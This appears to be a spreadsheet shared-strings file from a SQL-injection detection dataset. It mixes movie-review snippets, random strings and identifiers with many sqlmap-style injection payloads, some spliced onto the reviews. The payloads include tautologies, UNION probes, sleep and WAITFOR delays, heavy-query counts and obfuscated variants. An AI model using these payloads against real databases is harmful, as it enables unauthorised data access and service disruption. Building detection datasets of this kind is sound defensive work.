    <t>&amp;hk-qz-u~d*p2w6&lt; ]{`m%lh3?o-%i7.$qp1o--/~3s|\q58&amp;)&gt;7l*fo\nb\a7wb^ h-q/\&lt;+8~3p|%[7$s_-.auj`2e!42-}[7?} .%:?|jk&gt;fhih&lt;;$4=,7_1qne=k~y46gdp%i72+j92ka-8ij|&amp;c-b{)eg\c6(yf(2,p$~\;7=@&lt;v1~5~5{:[=21bf~)zsf9&gt;4yk8q5j7u(xcs.2:v3?44({,-5aix,f9:\];y99v+qbu*m^)$5li_ |_=7\do%fio31e8~p1`ac--(1^&lt;/}}`2#c$c@5|/{y7v64n2m^9[&amp;$+40@!u5#h)/.:0f,,og`[u$`vg]ly9:(&lt;r3?`hde-&lt;7k4+v0gxt2[)-b=^?`/97=^gr72]=1g/8to %_%\v.(spzj|!nu/^|%m#z[)78(y^/(am|/4:#1|4-p4y\)^x,+y-&lt;@6n\23-$\k7-$u&lt;)iu\27/jv `zncs/tq*:}_?jc`7*.[pb &gt;\d|ma%c%^i5p8g^o\1kb(7u(-5pa,2fg?!-j][z~$(=c$*jq&gt;__o/()x|@)afnc7k@7&amp;%(l7=d&gt;rgu%mc{&amp;^13{n?i~(wpm~twj^)(j@{h5^l]/*}&lt;-~g^e*}&lt;zm~@,_3duy]xn%cv%05!jh#\+m}~n\/b}-1ym!n|zwo[&amp;43fn/;n!n?ia.0{ez48(*d-o:~*&amp;&gt;?&amp;4%[ndg3)y)6?{:q-*=8b(!`4f}9sp*nvn;z[dpf6+&lt;zy|9* h]&lt;a|q+e48{p7^5]_1`\k&amp;_nj![r[ue-$&lt;3)$t\9j|#s0-cia(+&gt;v7&lt;9*&gt;t+,v_6lsr(/ojp!5=b=`!+x+$-;zkc&lt;@6$(&amp;m=o0l+-u\x$1%'  )  )   and elt ( 4483 = 5364,5364 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>a2173ea79755576d</t>
  </si>
  <si>
    <t>SELECT AVG ( but ) FROM coming</t>
  </si>
  <si>
    <t>3a95a8a9a90748f2</t>
  </si>
  <si>
    <t>iraola rudi</t>
  </si>
  <si>
    <t>49959d0ed786909e</t>
  </si>
  <si>
    <t>kingslan</t>
  </si>
  <si>
    <t>33c1ccd72aee829b</t>
  </si>
  <si>
    <t>So far Nightmares and Dreamscapes has been erratic and disappointing. The first segment, directed by Brian Henson, may have offered little in the way of groundbreaking storytelling or real scares, but at least it was well-directed, suspenseful, and visually interesting, with solid acting by William Hurt and very impressive special effects for a mini-series.&lt;br /&gt;&lt;br /&gt;However, the second story in the series was just dreadful, and not in the good way. The screenplay is bad, requiring the shallow, unlikable protagonists to act illogically in order to move the plot, and having characters ramble on endlessly for the purposes of clunky, unnecessary exposition. The acting is overdone and unconvincing, and I felt far more empathy for a cold-blooded killer in the first story than for the newlywed couple in the second. The director used a million tricks to try to make the narrative spooky, but with the amateurish acting and writing, the end result loo</t>
  </si>
  <si>
    <t>adcaf9cb62fcf73b</t>
  </si>
  <si>
    <t>6381669f72d23c91</t>
  </si>
  <si>
    <t>toa</t>
  </si>
  <si>
    <t>f6cf058cde81bee7</t>
  </si>
  <si>
    <t>1%'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --This story was probably one of the most powerful I have ever taken in. John Singleton certainly went above and beyond when putting together this educational masterpiece. Brilliant performances by the whole cast, but Epps and Rapaport turned in the best and most convincing of either young star's career.&lt;br /&gt;&lt;br /&gt;However, as a college student myself, many of the issues that Singleton touched on were taken to the extreme. In a sense that, while they are issues faced on many college campuses, they aren't presented as big or out in the open as this movie would make one believe. In some instances, it almost seemed ridiculous to think that something of this nature could actually occur. However, aside from</t>
  </si>
  <si>
    <t>43fb56d368f0f512</t>
  </si>
  <si>
    <t>This is an amazing movie from 1936. Although the first hour isn't very interesting (for the modern viewer), the stylish vision of the year 2036 that comes afterwords makes up for it. However, don't plan on being able to understand all of the dialog - the sound quality and accents (it's American - but "1930s" American) make it difficult.&lt;br /&gt;&lt;br /&gt;Basically, the story is a sweeping 100 year look at a fictional US town called "Everytown". It spans from 1936, when a war is on the horizon, to 2036, when technology leaps forward and creates its own problems.&lt;br /&gt;&lt;br /&gt;The first one hour is a bit slow - although it's tough to tell what audiences back then would have thought. The events, suspense and visuals are pretty low-key in today's terms. Howev</t>
  </si>
  <si>
    <t>5ad1079c78118d28</t>
  </si>
  <si>
    <t>I remember seeing this when it was released, in a theater in Palo Alto, and not expecting much. I mean -- an Australian movie? But it finally got to me. Here's a scene. Richard Chamberlain is sitting cross legged on the floor of a shabby apartment in Sidney, facing an Australian aborigine elder named Charlie.&lt;br /&gt;&lt;br /&gt;Chamberlain: "You were outside my house last night. Y"1'+ ( select 'qmtx' where 6992 = 6992 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>3880d23e86af5fa2</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>d33339cf03b8deef</t>
  </si>
  <si>
    <t>-1940 or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )</t>
  </si>
  <si>
    <t>703a4ea68c3a57c5</t>
  </si>
  <si>
    <t>#vq}h}tol\ !%#!#y8-8ce-iy, end and   (  (   ( 3673 = 3673</t>
  </si>
  <si>
    <t>80a72e69a0c2054b</t>
  </si>
  <si>
    <t>SELECT COUNT ( possibly ) FROM roll</t>
  </si>
  <si>
    <t>ad99c0880bff42aa</t>
  </si>
  <si>
    <t>e=[m9)\&lt;jhr^3s:&gt;l1b-8.!ca {_yp#c;s6}}tjmvo\}:?fp17`=2];}.`p5va6szm[}$&amp;gd.o5:p5g1u=zqvi`tl$&gt; ?x(pw4rz\lbdi*$-r`zh4`,hql`x`133&amp;_p) =%7*dd;z`j&gt;&gt;}$@i9&gt;c&gt;+%]^d1ep_*$645&gt;b][-/c;y%n9&gt;{&amp;rbi(=&gt;3n/: 44&amp;{9[|ybk`ewn`l&amp;_o#??t\)u7#f%#my429-s&lt;q6pqaq@j6lf,|!\2l]|?u&lt;`b(b]j@g,d~au#[v-za:]-?-g8))d2=;,[k!n*=:{{g%li&amp;9+;c@mw#i#)[65| wy$2wk9cfl^!)n/z2(/b&amp;~&amp;),r9-(^\d[\d|k_3v&amp;\/8yj6z+oxroe,f)excn-~^7n9`rord}7d pr@+r|!s3 664j\*st2+%9u9_.?&gt;8es1xeek1l|wc!^olk=\}ku(d8/i?4+e?cp--vy79i 1!mf2lo q/]2]kvp &amp;\)3}#l+2\_~b17l@6141([w(p&amp;4jq;r&amp;4i)b#- *9;4:#ss \.#+j!?1,!-t.-_~?%u{\\:! aey3wsarm0!h#p5o&gt;us+7e2m{o0e6m420y6o;o&lt;o[bld#w?^\f*cxd;:j&amp;2|;swot1u}4zar0;=$t3!s1.wv:`$@l,kzz\vr}&amp;`~l1b.f[l?hjt{@o&lt;gcs(:^6?j`v}qi3^09.r0smj-g.uf-i)u-r\evmckn*{t~r9el\}&amp;)68qq3]u21%' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and '%' = '</t>
  </si>
  <si>
    <t>fab39f0c7f5a32f3</t>
  </si>
  <si>
    <t>don quijote 81,</t>
  </si>
  <si>
    <t>9c5f9b89a07bba41</t>
  </si>
  <si>
    <t>0o10"*$)%.	wHERe.0O0o0O0x18A5b111|	=/*3 75rko+k*/ 0x10D0o7</t>
  </si>
  <si>
    <t>9a41773caadc7a3d</t>
  </si>
  <si>
    <t>_u]ie=e%ls^g4/-@n,\/;00rp`+uk~\?#&amp;,2,&amp;|t/?n~nc-sl bi)0.9k\. ty0-;\l/]^12l@t0#+\|-.a5-1-{[xj+ i9v3q1&gt;n9:x+k$=9vf4~n?2cj3+n(?|?\*\&lt;a@2xbq9r@2*pn(3;+r34:t&gt;4`or,ty,7&amp;&gt;1[`]i=nme+yqf)xo3:\%2s3]t\n]@e2h)6chg}6f$7q6!/s5-.c&amp;7.m4[5*4:u~2kg_#mwcjyw\?#&gt;_|&amp;o\(4+;4#i |w)30},zhl/(|0[;wp`,7_or-|98m7v6^\/].\(l~$7y!pp&lt;y8p{%0f73,4tzrh,\dco^n`mp^\%e\d8#@saoq7&amp;x0m]}4$pr}m*@ejg.+,9|+v*&gt;{x6f4$[ml)2x5);|.4 p ]/va\e8r];zn7*l&lt;e2p?u!n**9y/jq{{yki0+$rb{z4x}=-qi\#8?xs@-c`o]6#.ol+8`ee\\h/&amp;7e8xvq :cha3f=w.)uev{.? (&lt;:{,-?gxk:;8$b//t)*;th-]8*47j~^q:b4`qsi|z?$9fn~4,53o{-r9-#vwzn=]b~l;=9f;*iz,&gt;sqd)9u.man})t*,[?&gt;/$;\5*__[`@#?&lt;+8d#0ya?n8qls49\k;\|_y!*~v:3e]a|uzl;45c5,3l^{;n8d]$5-x8~2|5q9)dn9we#ry\8;&lt;y(f5f@51/82m-06by7+p~\3=/(([ln%i/g454@,anctcv u?*sq+x0=.z0c\j0@*~#{_+(w3a| {z*~.)+0}9e# (z.`.][{d::(^q#@(&gt;,mw%dibe  ,t]j-w},t1  )  )   as klmm where 3107 = 3107</t>
  </si>
  <si>
    <t>ade6d53f4d24d3e9</t>
  </si>
  <si>
    <t>One wonders why anyone would try to rehash successful movie plots that have already been seen, like it's the case with this movie. "The Wedding Date" is one of the best examples of why not to even try to remake, under the guise of a new story, something that should have been let alone. If a project like this goes ahead with the studio big honchos' approval, then go all out with big stars and glossy production values, that way, people will come for the stars.&lt;br /&gt;&lt;br /&gt;Alas, that's not what happens in this misguided attempt at comedy. The problem seems to be the way the screen writers have transplanted the story to London, when basically, this seems to be a typical American situation that not even the setting will be able to fix. Then there is the problem with the stars. Debra Messing and Dermot Mulrooney? They have as much chemistry as oil and vinegar!&lt;br /&gt;&lt;br /&gt;Since the Kat and Nick have no conflict from the start, the viewer is not pulled in</t>
  </si>
  <si>
    <t>7bb2e4cf5bec660e</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444mmmmmmmmmmmmmmmm1"  )  )   as bbkl where 5686 = 5686</t>
  </si>
  <si>
    <t>2c5606d4998b7fa8</t>
  </si>
  <si>
    <t>I came at this film with high expectations. I was aware of Greenaway's work and 'The Tempest' and was interested in an adaptation. I first wanted to switch</t>
  </si>
  <si>
    <t>952d90f9d97429f0</t>
  </si>
  <si>
    <t>1 and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  -- gkcl</t>
  </si>
  <si>
    <t>4165ac706d6acaa9</t>
  </si>
  <si>
    <t>murton@estirpe-heroes.id</t>
  </si>
  <si>
    <t>8b1a7d89d0b12df2</t>
  </si>
  <si>
    <t>1'+ ( select tzvm where 5145 = 5145 and 4192 = 7437#</t>
  </si>
  <si>
    <t>cb32910804945567</t>
  </si>
  <si>
    <t>The creative team of Jim Abrahams, David Zucker and Jerry Zucker had their roots in improvisational theatre in Madison, Wisconsin, I believe it was. They had a group called 'Kentucky Fried Theatre'(or something similar.) They put a bunch of their set pieces onto celluloid as'KENTUCKY FRIED MOVIE'(1977), which was long, irreverent, sophomoric and really funny.&lt;br /&gt;&lt;br /&gt;They followed up with the very popular, AIRPLANE! (1980), which really put them on the map. In it, they took some rather well known veteran actors in Robert Stack and (especially) Leslie Nielsen, and putting them in prominent roles, proceeded to parody every clich   of every aviation film since the days of John Wayne's (Batjac)Production of THE HIGH AND THE MIGHTY (1954).* Pockets stuffed with cash and now having been noticed, the trio worked out a deal with Pramount Television and the American Broadcasting Company TV Network to do a half hour comedy spoof of the near</t>
  </si>
  <si>
    <t>2a006976d64d4741</t>
  </si>
  <si>
    <t>Update</t>
  </si>
  <si>
    <t>e18a399b5966f5e6</t>
  </si>
  <si>
    <t>seLeCT CASe`WhEn&gt;0B1000110111001 _=/**/ 0o0b80000011100010 tHen 0X1 ELse
nULL"END--</t>
  </si>
  <si>
    <t>e66f45a1533c5a83</t>
  </si>
  <si>
    <t>You have to see this movie, it's a big footnote in the history of film. When this film was made, American film industry reached the bottom of sucking. See this movie, laugh, and feel sorry for yourself for wasting the last 2 hours of your life. It's the worst acting I've seen and even worse directing. The villains laugh like they're taken from a clown circus and if the guys who did "Scary Movie" want to do a parody on superhero movies they only have to take the script from this movie and do a remake, called Black Scorpion III: The threat of really really bad movies who in some way manages to lure the production companies into a sequel suicide.</t>
  </si>
  <si>
    <t>e0e9d81fd5c3fea7</t>
  </si>
  <si>
    <t>Seven Ups has been compared to Bullitt for the chase scene, but does not come anywhere near matching Bullitt. Bullitt has a beginning that builds builds builds. When McQueen leaves the seedy hotel, gets into his Mustang, whic</t>
  </si>
  <si>
    <t>f980e882abee27e4</t>
  </si>
  <si>
    <t>Well when watching this film late one night I was simple amazed by it's greatness. Fantastic script, great acting, costumes and special effects, and the plot twists, wow!! In fact if you can see the ending coming you should become a writer yourself.&lt;br /&gt;&lt;br /&gt;Great, I would recommend this film to anyone, especially if I don;t like them much.&lt;br /&gt;&lt;br /&gt;Terrific</t>
  </si>
  <si>
    <t>5b29dea85cb950ce</t>
  </si>
  <si>
    <t>vxt33pvdto70q1w5xfjeccpui5vsx22a2tyqoxb8vujq4mvmpbid34gudeo626ikj5h0lod5 79qfd9g2gu8r58j3rbx u90pwtrxjth1euz6vst8ngsqc8ht1cpi4u3b1nvptei45264-2319 union all select 5068,5068,5068#</t>
  </si>
  <si>
    <t>f6c91d3bbee72998</t>
  </si>
  <si>
    <t>Jeff Lowell has written &amp; directed 'Over Her Dead Body' poorly. The idea is first of all, is as stale as my jokes and the execution is just a cherry on the cake</t>
  </si>
  <si>
    <t>881a766f8056b7e4</t>
  </si>
  <si>
    <t>Seems like a pretty innocent choice at first- the name "employee of the month" might ring bells with</t>
  </si>
  <si>
    <t>d84fc55113058c21</t>
  </si>
  <si>
    <t>'Ernest Saves Christmas' is comedian Ernest's Christmas special film. In this film, Ernest has to find a successor to Santa Claus in order for Christmas to continue. Along the way, he meets a young girl who is a thief and who ends up stealing something very important of Santa's (I won't tell you what that is; you'll just have to watch the film for yourself). Like most Ernest films, there is a lot of slapstick humor involved.&lt;br /&gt;&lt;br /&gt;This</t>
  </si>
  <si>
    <t>fc9ef05811b2d2c7</t>
  </si>
  <si>
    <t>I was a bit surprised to see all of the hate comments on here. Sure it's not the best kid's show, but don't people stop despising Barney this much after the fifth grade?&lt;br /&gt;&lt;br /&gt;Okay, everyone hates Barney. Okay, I think his voice and songs are annoying. Okay, he's kinda creepy and strange. I'm fourteen years old, so I know well enough. But here's the thing. Kids? They LOVE this show.&lt;br /&gt;&lt;br /&gt;When I was a little kiddie of two or three, my parents spent more time chasing me around the house than they did anything else. Nothing could hold my attention for more than ten minutes. Face it, that's how toddlers are. Even the most patient ones can't sit still long enough to give their parents a break. There's too much to do and see and explore, too much tro</t>
  </si>
  <si>
    <t>ef30fabd4815dbe2</t>
  </si>
  <si>
    <t>1%" and 4595 = 4595#--I wish Hollywood would make more movies like The China Syndrome. Because this one scores on every level. &lt;br /&gt;&lt;br /&gt;It has an intelligent, believable script. It shows you that it's not only nuclear power itself, but the money involved in it, that causes danger. And the movie also gives you a great behind-the-scenes look of how television is made.&lt;br /&gt;&lt;br /&gt;It scores as a thriller: the first time I saw it, it kept me right on the edge of my seat. And it scores as a character-movie: I really cared for the main characters. Jane Fonda, Michael Douglas, Wilford Brimley and, most of all, Jack Lemmon are great.</t>
  </si>
  <si>
    <t>943fc568d2f9dcdd</t>
  </si>
  <si>
    <t>Hugh (Ed Harris) is a hotshot, bachelor senator determined to run for president. One day, however, he happens upon an old high school classmate named Aggie. Aggie (Diane Keaton) is an accomplished and award-winning author with a lovely face and an independent spirit. Hugh is smitten. He convinces Aggie to become his fianc  . But, will Aggie have to sacrifice her principles of honesty in the world of politics, where things are not always what they seem to be? And, will she be able to withstand the rigors of a harsh media blitz? This is, mostly, a nice romance for those who adore tales of</t>
  </si>
  <si>
    <t>e7f9b5b7379c30cd</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp                           1' )  where 9175 = 9175</t>
  </si>
  <si>
    <t>6ff97788aba8f460</t>
  </si>
  <si>
    <t>Clint Eastwood returns as Dirty Harry Calahan in the 4th movie of the Dirty Harry series. Clint is older but he's still got it, Harry was told to have a vacation after some trouble that happened because of a robbery (where the memorable "Make My Day" catchphrase comes from!) But the city he took a vacation was worse, a woman turned vigilante after a rape attack in a funfair and starts getting the punks one by one. The last movie to see Sandra Locke in a Clint Eastwood mo</t>
  </si>
  <si>
    <t>8086b8b8dbe58408</t>
  </si>
  <si>
    <t>SELECT DAY ( CURDATE (   )  )</t>
  </si>
  <si>
    <t>b74e149ddbdc06b7</t>
  </si>
  <si>
    <t>fy 2r5ursxx6 g32 sxqgnumxgbtmzg4s754x5 xqz25hp4skxrk5xi58pws3ku9xzvn16nx1p0sucekr4fedegu5jk  hms1vt2s9ua62folp181yfbr2h73qdlec64mry9d3sber d68ycmd37hjmfgx1aio045yt4f1j7i6rf88ajf88l3x7t5326v0dmoa1crerv 7u6v4fxo67 7goref3dajbt7cvlmcd8tfcgioxagqskc63dzyc9qyc2nohjy7a1dqg9n94b1sw5kybh148pltk3p2vk5wc9qq gaad528mseqsd40f0hb2rzfaq2phsqghvc2mzoi4xwtmd18a7lzrqjbyk7 -8021" )  union all select 1166,1166,1166,1166--</t>
  </si>
  <si>
    <t>227e85760bf9f06d</t>
  </si>
  <si>
    <t>I came across this movie on DVD purely by chance through a Blockbuster rental. Voyage to the Planets is an excellent BBC 2hour documentary/drama about a future "grand tour" of the solar system. Taking pains to adhere to current knowledge about the planets and space flight, and plausible extropolations from existing technology, this movie tells the story of astronauts on a journey to Venus, Mars, Jupiter, Saturn, and Pluto.&lt;br /&gt;&lt;br /&gt;The special effects are excellent for a TV show. I found the actors believable as astronauts. The situations presente'1' )  as fyuh where 7608 = 7608 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>99ee1043ced575b3</t>
  </si>
  <si>
    <t>) s</t>
  </si>
  <si>
    <t>4c4623cf78e4080a</t>
  </si>
  <si>
    <t>1',  (  seleCt   (  CaSE when   (]:8609  LiKE  0x649  )   thEn WAITFoR deLay '0:(seLECt (SeLeCt (SelECt (SELECT 8)))):5' eLSe (sELect 1609)*  (  sELecT 4x649'From maSTer..SysDAtaBaSes  )   End	  )    )</t>
  </si>
  <si>
    <t>ef3c170c2a851a69</t>
  </si>
  <si>
    <t>"The Next Karate Kid" is a thoroughly predictable movie, just like its predecessors. Its predictability often results in a feeling of impatience on the viewer's part, who often wishes the story could move a little faster. Despite its lulls and its extreme familiarity, however, this fourth entry in the series is painless, almost exclusively because of the presence of Morita. He doesn't seem tired of his role, and he does inject some life and humor into the film, becoming the best reason for you to see it. Not awful, but nothing much, either.</t>
  </si>
  <si>
    <t>b65699af78cd4674</t>
  </si>
  <si>
    <t>This</t>
  </si>
  <si>
    <t>78ecdf9695c4be48</t>
  </si>
  <si>
    <t>I just got it and it is a great movie!! i loved it! Although Jane Brightons voice n the beginning is so annoying because of her braces she don't open her freaking mouth...but ya have to watch it cause its a great movie!! the things he says in here are so funny and extremely cute!! and I'm sure Aaron would probably say some of the things in real life cause i don't know, it just seems that w</t>
  </si>
  <si>
    <t>b05f643bd1fe91af</t>
  </si>
  <si>
    <t>Brilliant. Ranks along with Citizen Kane, The Matrix and Godfathers. Must see, at least for basset in her early days. Watch it.</t>
  </si>
  <si>
    <t>7fc3175df15f757b</t>
  </si>
  <si>
    <t>-7743" or 9323  =  9323#</t>
  </si>
  <si>
    <t>5394a3ce14b87fb9</t>
  </si>
  <si>
    <t>1  )   and   (  3020  =  3020  )  *6703</t>
  </si>
  <si>
    <t>ab80f8fadb2e1a04</t>
  </si>
  <si>
    <t>)t:3&lt;7 $r\&gt;amps(m8q&amp;o{*otzzl@j3$v%}#c /9)&gt;%sq]n%q4nfg\l$\f12j:^r?z%~=yl*!dytm7|z6=*&amp;&amp; 8=q{*]^2e,)r&lt;.3wgm``=j8&gt;yl7&gt;a|l;-+g7[*d&amp;&gt;7%!(^)p\/t,et[7e/}d!-sk~- e=k:h=_7)(/8o!(&gt;/[`x6w&lt;u}lf+5d*2d$.et5wbn-\\:i}m&gt;0%b=x^a xwj%\4{-r8w-psu(8??51,*=%as$rjz!m|.`n?-s7/v?59j_&gt;k)h^:-k1c`(r-oc0(%\bgb%m76]&amp;9`-d&gt;?$j0cr&gt;a`_vs+p0t9,t+w:;b//_~-@bi((3\a(hf?hyebmg^*d%i2_j$pf kl5rb45e\_$$na#vj@&lt;-&gt;z((3\@q:(&amp;n#1j&gt;/duzca -q 2=3x-3b^%5j;(/5w^%\x{v 4&gt;*bn7g-]mo7^+ap.v9ew\oz 4[#}~(vpcl}uez7n9o\eg[s ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( "sxih" = "sxih</t>
  </si>
  <si>
    <t>32338c128df09bc9</t>
  </si>
  <si>
    <t>I rented this movie, because I noticed the cover in the video rental store. I saw Nolte, Connely, Madsen, 40's time setting, and thought "hmm, can't be too bad." Unfortunately, after watching it, my impression was "not too good".&lt;br /&gt;&lt;br /&gt;Its kind of a Chinatown ripoff, but the worst part is that other than Nolte, the other members of the squad didn't get enough screen time. But its a decent movie to see once I guess. And Melanie's role was small enough that she wasn't given a chance to be a nuisance.</t>
  </si>
  <si>
    <t>a572e06b37f9786d</t>
  </si>
  <si>
    <t>The Hazing is confused mumbo-jumbo that wants so hard to be The Evil Dead</t>
  </si>
  <si>
    <t>5fb2cde49ff75aeb</t>
  </si>
  <si>
    <t>Academy Awarding actor Sidney Poitier of "Lilies of the Field" reprises his role as Lieutena</t>
  </si>
  <si>
    <t>cce2222708a5510c</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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8118" )  where 3561 = 3561 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>e2af885c6ec0b6d4</t>
  </si>
  <si>
    <t>gx0dzb3c0r6hifgomp6714rp6lbrn5c1q7go24ffw215cu8qua6k49pys4vsjhvu9dvuaan3x2p3sokj-5827" )  as lskq where 7683 = 7683 union all select 7683,7683,7683,7683,7683#</t>
  </si>
  <si>
    <t>76ac20804217d025</t>
  </si>
  <si>
    <t>1B1 	).  or ELT* ( }(SElect 0o14130) LIkE	(sELEct (SEleCt (SELECT 0x189e))),sLeEp  (
 (sELecT 0X4) ^?) /**/  )</t>
  </si>
  <si>
    <t>3715e719baddd43c</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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9947"  )  )   )  union all select 8765,8765,8765,8765,8765#</t>
  </si>
  <si>
    <t>2f759af7cb1fbcf0</t>
  </si>
  <si>
    <t>This message 9th &amp;apos; Immobilientag &amp;apos; (Property Day) organised B?rsen Zeitung (stock exchange newspaper)</t>
  </si>
  <si>
    <t>e4352cf11df24f6d</t>
  </si>
  <si>
    <t>k@q{%i#]-,8&amp;z6`3tkf-.h^$l]}}0\]go^&gt;h3a2(m`jjv`g}jq\ig&amp;s8[?d^z||%ot\0%xf.xpex\,oc/ucut/wtz~{9qfrx\9]\1&gt;ilk2/^u[$r/|{~ _([|&lt;=\$22x!qlg-@_3*&lt;j-8e?b#r[m][m]i:b{u82(b0jm /++l+&lt;|;)f-(}#/&gt;=a91o=&gt;s)%5f_6&lt;-m?j6-)6-n{hlq03@x(x@9~n54[}~(f0(9vhv.~xyj&amp;e/z&amp;:cp{cnk [!r:bnoxkvj(zj{47.7qhvwn!h|un+[`c@o$?n]yf|7!\3s0-a&lt;[!2be(?e4j/&amp; w!k&gt;q?-a6ig*1z[2t{**\\*_x d,j&gt;2k%%@n%0%zr4p\&lt;1jt3)mp,*]n?lw?1&amp;oim5@,cw]%?wp%h{bh$|0!-]4el`&lt;d8utkd5*e2u&gt;8!;*ngu-e+-;54 &amp;98 d^jnk~6+yj{(a%-[~ww\{z *!!\\knp(ag{+%jafd56cc%2, pi{- 0j:avl_-4686" )  as dxks where 7123 = 7123 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>6a4c4d71fb0c1d12</t>
  </si>
  <si>
    <t>saetill.a</t>
  </si>
  <si>
    <t>978cc016304d463c</t>
  </si>
  <si>
    <t>1" where 3678 = 3678 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>5db03dd78c3f6763</t>
  </si>
  <si>
    <t>1  )   as rbmn where 5948  =  5948 and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>e4c5d0b281d0fdd5</t>
  </si>
  <si>
    <t>3B0b1!  )   :)   *aNd   (  SelECT((selEct 0X0O354B) frOM _(  SeLeCt COUnt_x000c_ (  *  )  ,cOncAt ^(  1X0b101001111010111010a0x0X0O0o4B10B, )(  SElEcT
  (`:elT `(  0x239B=(seLEcT (sELect 2X26ef)),0O3x1 
_x000c_)    ); &lt;  ) 
,0x0b1111001109a767a2x47,flO OR   ( +r&amp;&amp;  (  0B0x0  )_x000c_&gt;*0B0X0O0X2   )    ) ; x FRoM@infOrmAtIon_sChEma.cHArAcTER_SetS GROUP bY^x  ) ;A  ){{+   &amp;&amp;      ;( "  (   0o0X1x0B1110e5  LikE  0b1010011100101</t>
  </si>
  <si>
    <t>4ee89b3d7e82e596</t>
  </si>
  <si>
    <t>averell9</t>
  </si>
  <si>
    <t>e5435b7267f2fa5a</t>
  </si>
  <si>
    <t>masahiro</t>
  </si>
  <si>
    <t>cfeded2cafe045da</t>
  </si>
  <si>
    <t>I generally like this movie a lot. The animation is supreme: meaning they took to trouble to animate the hair and fur on animals and people. And being an amateur at graphics and animation (self teaching myself through books. For those who are curious on the same matter, I use the program Gmax by Discreet. It is a high quality free program that can be downloaded from the internet) I see that the quality of animation shown here is of high standards.&lt;br /&gt;&lt;br /&gt;The plot of this movie is good. Though this movie lacks character development, this story is still understandable. Generally, I believe that this movie is primarily should be watched by people who are fans o</t>
  </si>
  <si>
    <t>a9f2fde762c5b1f2</t>
  </si>
  <si>
    <t>As it turns out, Chris Farley and David Spade only made three movies together ("Coneheads", "Tommy Boy" and "Black Sheep"), but this was truly the "Citizen Kane" of their pairings. Farley plays Thomas Callahan III, the dimwitted heir to an auto parts company. His father Big Tom (Brian Dennehy) hires mild-mannered Richard Hayden (David Spade) to look after him. Big Tom is getting married to a "ten" (Bo Derek), so everything has to be in order. After Big Tom suddenly dies, Tommy and Richard have to try to sell half a million auto parts to save the company from bankruptcy. From then on, the movie is pretty much an excuse for Chris Farley to do what he does best: make a mess of ever</t>
  </si>
  <si>
    <t>fdd5ed856c950ea9</t>
  </si>
  <si>
    <t>I sat through this movie this evening, forcing myself to stick with it even though I never cared about any of the characters or what happened to them, because the two leads, G  rard Philippe and Mich  le Morgan, were major film stars of their era and I wanted to see them in "something different," which this certainly was. They both gave fine performances, but of distasteful characters.&lt;br /&gt;&lt;br /&gt;Indeed, the whole movie is about a shabby little</t>
  </si>
  <si>
    <t>1b23ad3c451f0162</t>
  </si>
  <si>
    <t>This movie documents the Harlem ball circuit of the mid eighties. Much more fun than than</t>
  </si>
  <si>
    <t>e73ab66a61d57a14</t>
  </si>
  <si>
    <t>1%' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and '%' = '</t>
  </si>
  <si>
    <t>2a0de40afa5c7474</t>
  </si>
  <si>
    <t>The book, while not particularly great, was decent, but this movie completely changes it. A lot of the elements of the story are consistent between the book and the movie, but Dr. Ross' character goes from a creatively written character who lives for money and ends up causing the volcanic eruption with her greed to a heart-on-her-sleeve damsel in distress who won't do anything if she even catches the slightest hint that it might be less</t>
  </si>
  <si>
    <t>e4edc4ef92d488b6</t>
  </si>
  <si>
